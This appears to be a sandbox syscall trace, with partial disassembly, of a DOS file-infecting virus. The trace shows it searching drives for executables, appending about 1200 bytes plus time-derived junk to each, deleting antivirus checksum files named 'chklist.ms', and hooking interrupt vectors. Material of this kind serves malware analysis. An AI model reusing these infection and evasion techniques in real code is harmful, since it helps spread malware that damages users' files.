2018-12-25T12:23:32.69031813Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.692742369Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.698761726Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.702410773Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.710018067Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.71206994Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.71891566Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.720147173Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.72130132Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.725208094Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.731406949Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.737254281Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.740103668Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.747295469Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.756716544Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.760506347Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.766403927Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.775699136Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.783223786Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.784775496Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.790946002Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.793604555Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.79590615Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.798124363Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.801321899Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.807270412Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.809564738Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.817349667Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.819388969Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.83197715Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.834412475Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.83567125Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.841682662Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.84775913Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.855755746Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.857959657Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.870211646Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.879526955Z 14 PC: 151e9 | Set default drive (Drive = 'D')
2018-12-25T12:23:32.880824701Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.885469796Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.889502421Z 14 PC: 151f2 | Set default drive (Drive = 'E')
2018-12-25T12:23:32.890694666Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.894893647Z 14 PC: 15218 | Set default drive (Drive = 'A')
2018-12-25T12:23:32.89610253Z 59 PC: 15220 | Change current directory
2018-12-25T12:23:32.904252274Z 44 PC: 1523c | Get time 0x1523c: cmp cl, 5
0x1523f: jne 0x15244
0x15241: call 0x1534a
0x15244: cmp cl, 0xd
0x15247: jne 0x1524c
0x15249: call 0x15359
0x1524c: cmp cl, 0x1e
0x1524f: jne 0x15258
0x15251: lea dx, word ptr [bp + 0x290]
0x15255: call 0x15330
0x15258: cmp cl, 0x28
0x1525b: jne 0x15264
0x1525d: lea dx, word ptr [bp + 0x290]
0x15261: call 0x15330
0x15264: cmp cl, 0x32
0x15267: jne 0x15270
0x15269: lea dx, word ptr [bp + 0x2c7]
0x1526d: call 0x15330
0x15270: lea si, word ptr [bp + 0x195]
0x15274: lea di, word ptr [bp + 0x18d]
2018-12-25T12:23:32.912703877Z 78 PC: 15337 | Find first file
2018-12-25T12:23:32.921395756Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.931190504Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.966506341Z 53 PC: 14fba | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:32.968371121Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.969768816Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.971313022Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.972720415Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.973811645Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.975512982Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.976552109Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.977611135Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.97882826Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.979893136Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.980835082Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.982129324Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.983072206Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.983987931Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.985328333Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.986509382Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.987667264Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.989319815Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.990501359Z 37 PC: 14fcf | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:32.99143431Z 37 PC: 14fd7 | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:23:32.992640286Z 37 PC: 14fdf | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:23:32.993806204Z 37 PC: 14fe7 | Set interrupt vector (Interrupt = '63' AKA 'Read file or device')
2018-12-25T12:23:32.995139732Z 68 PC: 15eab | I/O control for devices (Set for = '� ��O�Э:E�t��ҭ3ɬ� �u��ŝ]_^ZY[�P�/��t�\�ЭXâЭX�SQRWV�������6έ�6̭�6ʭ2ɬ �t:�t��t�����2ɪ���6έ��3����t!�Э �u:E�t��� �u�����}��')
2018-12-25T12:23:33.133430016Z 64 PC: 1563b | Write file or device (Write 0 bytes on handle 1)
2018-12-25T12:23:33.135154238Z 37 PC: 15111 | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:33.136236539Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.138071094Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.139158178Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.140279119Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.142330171Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.143387581Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.144419104Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.146404028Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.147445761Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.148473439Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.150429467Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.151471624Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.152492569Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.154431393Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.155469245Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.156484259Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.158443545Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.159468144Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.160430766Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.16283552Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.164746028Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.166636673Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.168744081Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.170600484Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.172366682Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.174794888Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.17657552Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.178344927Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.181142304Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.183012006Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.184777423Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.187758975Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.189538883Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.191509237Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.193906921Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.195975841Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.198371705Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.200773501Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.20274649Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.20601581Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.208441153Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.210977614Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.213547314Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.215585868Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.217417685Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.220266539Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.22218268Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.224096385Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.226557693Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.228549618Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.230637936Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.235219593Z 76 PC: 15150 | Terminate with return code (Return code = '200')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":9667,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:31.399114006Z 25 PC: 15198 | Get default drive
2018-12-25T12:23:31.401472351Z 71 PC: 151a7 | Get current directory
2018-12-25T12:23:31.411777245Z 26 PC: 153fd | Set disk transfer address
2018-12-25T12:23:31.412947689Z 78 PC: 15408 | Find first file
2018-12-25T12:23:31.420001904Z 67 PC: 1542b | Get or set file attributes
2018-12-25T12:23:31.426584909Z 67 PC: 15433 | Get or set file attributes
2018-12-25T12:23:32.046323853Z 61 PC: 15438 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:23:32.053932805Z 87 PC: 1543e | Get or set file date and time
2018-12-25T12:23:32.055784657Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:23:32.062050825Z 66 PC: 154a6 | Move file pointer
2018-12-25T12:23:32.064014561Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]
0x15512: inc di
0x15513: shl dx, 1
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512
0x15524: mov ah, 0x2c
0x15526: int 0x21
0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
2018-12-25T12:23:32.066652666Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
2018-12-25T12:23:32.069081578Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
0x15555: mov ah, 0x2c
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-25T12:23:32.072140446Z 64 PC: 15550 | Write file or device (Write 9 bytes on handle 5)
2018-12-25T12:23:32.07542195Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, 0x4202
0x15581: xor cx, cx
0x15583: xor dx, dx
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9
2018-12-25T12:23:32.077869167Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
2018-12-25T12:23:32.086476571Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, word ptr [0x5b00]
0x15581: xor ax, dx
0x15583: xor bx, cx
0x15585: iret
0x15586: cmp byte ptr [bp + si - 0x58], dl
0x15589: or cx, dx
0x1558b: ljmp 0x11e0:0xc8ca
0x15590: leave
0x15591: pop dx
0x15592: cdq
0x15593: out 0x18, al
0x15595: cmp al, 0x90
0x15597: xchg ax, sp
0x15598: retf 0x2706
2018-12-25T12:23:32.089350011Z 64 PC: 1557b | Write file or device (Write 25 bytes on handle 5)
2018-12-25T12:23:32.092499148Z 66 PC: 15587 | Move file pointer
2018-12-25T12:23:32.094181287Z 66 PC: 155a8 | Move file pointer
2018-12-25T12:23:32.096897396Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-25T12:23:32.100317193Z 67 PC: 15345 | Get or set file attributes
2018-12-25T12:23:32.107713569Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-25T12:23:32.11423057Z 87 PC: 155cc | Get or set file date and time
2018-12-25T12:23:32.115712263Z 62 PC: 155d0 | Close file
2018-12-25T12:23:32.120871804Z 67 PC: 155da | Get or set file attributes
2018-12-25T12:23:32.127998325Z 79 PC: 1541f | Find next file
2018-12-25T12:23:32.139755294Z 59 PC: 152c0 | Change current directory
2018-12-25T12:23:32.143209572Z 14 PC: 151d5 | Set default drive (Drive = 'C')
2018-12-25T12:23:32.145486734Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:32.14637926Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:32.149765055Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.152818028Z 59 PC: 151e0 | Change current directory
2018-12-25T12:23:32.156576423Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:32.157520889Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:32.165265245Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.169103321Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.496700571Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.501910597Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.503105534Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.506705829Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.508298594Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.510146899Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.511691285Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.513718982Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.517651319Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.519418375Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.526192Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.527686775Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.529604175Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.531277894Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.532328274Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.534228993Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.540478795Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.544185737Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.54528208Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.550546708Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.557316275Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.560462071Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.570547773Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.577111224Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.584281003Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.586619827Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.592052271Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.593115791Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.595303208Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.596843538Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.598356883Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.602694238Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.604381735Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.609300807Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.611229591Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.613256917Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.614370021Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.615901416Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.617819675Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.621856892Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.626333505Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.628115529Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.634950199Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.659128051Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.662494864Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.668903767Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.67838578Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.685387273Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.686804783Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.692692699Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.694492921Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.696528921Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.699161044Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.701992019Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.708462676Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.710725662Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.720162949Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.722180828Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.724977482Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.727347162Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.728869924Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.731548502Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.738418028Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.744179955Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.746139332Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.754524285Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.76416154Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.768098809Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.775627654Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.784940548Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.7924943Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.795673461Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.801289365Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.80295173Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.805235511Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.807842192Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.810124401Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.816894307Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.82007978Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.827765221Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.830100261Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.8338344Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.836585999Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.838130396Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.841853517Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.848146141Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.854114489Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.856372045Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.865202236Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.875139229Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.879355544Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.884277886Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.891403139Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.897592827Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.898780791Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.904357037Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.90773336Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.910262653Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.912715084Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.915920853Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.92347858Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.926163946Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.934100509Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.936331412Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.939207968Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.941604934Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.942956076Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.946040832Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.952348448Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.958014891Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.959390749Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.967182629Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.977134196Z 14 PC: 151e9 | Set default drive (Drive = 'D')
2018-12-25T12:23:32.978382175Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.983296057Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.987234309Z 14 PC: 151f2 | Set default drive (Drive = 'E')
2018-12-25T12:23:32.988482878Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.993302683Z 14 PC: 15218 | Set default drive (Drive = 'A')
2018-12-25T12:23:32.996532963Z 59 PC: 15220 | Change current directory
2018-12-25T12:23:33.001294429Z 44 PC: 1523c | Get time 0x1523c: cmp cl, 5
0x1523f: jne 0x15244
0x15241: call 0x1534a
0x15244: cmp cl, 0xd
0x15247: jne 0x1524c
0x15249: call 0x15359
0x1524c: cmp cl, 0x1e
0x1524f: jne 0x15258
0x15251: lea dx, word ptr [bp + 0x290]
0x15255: call 0x15330
0x15258: cmp cl, 0x28
0x1525b: jne 0x15264
0x1525d: lea dx, word ptr [bp + 0x290]
0x15261: call 0x15330
0x15264: cmp cl, 0x32
0x15267: jne 0x15270
0x15269: lea dx, word ptr [bp + 0x2c7]
0x1526d: call 0x15330
0x15270: lea si, word ptr [bp + 0x195]
0x15274: lea di, word ptr [bp + 0x18d]
2018-12-25T12:23:33.027431366Z 53 PC: 14fba | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:33.028849623Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.029770988Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.03122895Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.032220864Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.033153689Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.034705752Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.03564866Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.036581167Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.038120407Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.03904965Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.039969008Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.041559664Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.04247066Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.04338492Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.045189749Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.046158629Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.047166436Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.04874157Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.049742096Z 37 PC: 14fcf | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:33.050715479Z 37 PC: 14fd7 | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:23:33.052276982Z 37 PC: 14fdf | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:23:33.053141851Z 37 PC: 14fe7 | Set interrupt vector (Interrupt = '63' AKA 'Read file or device')
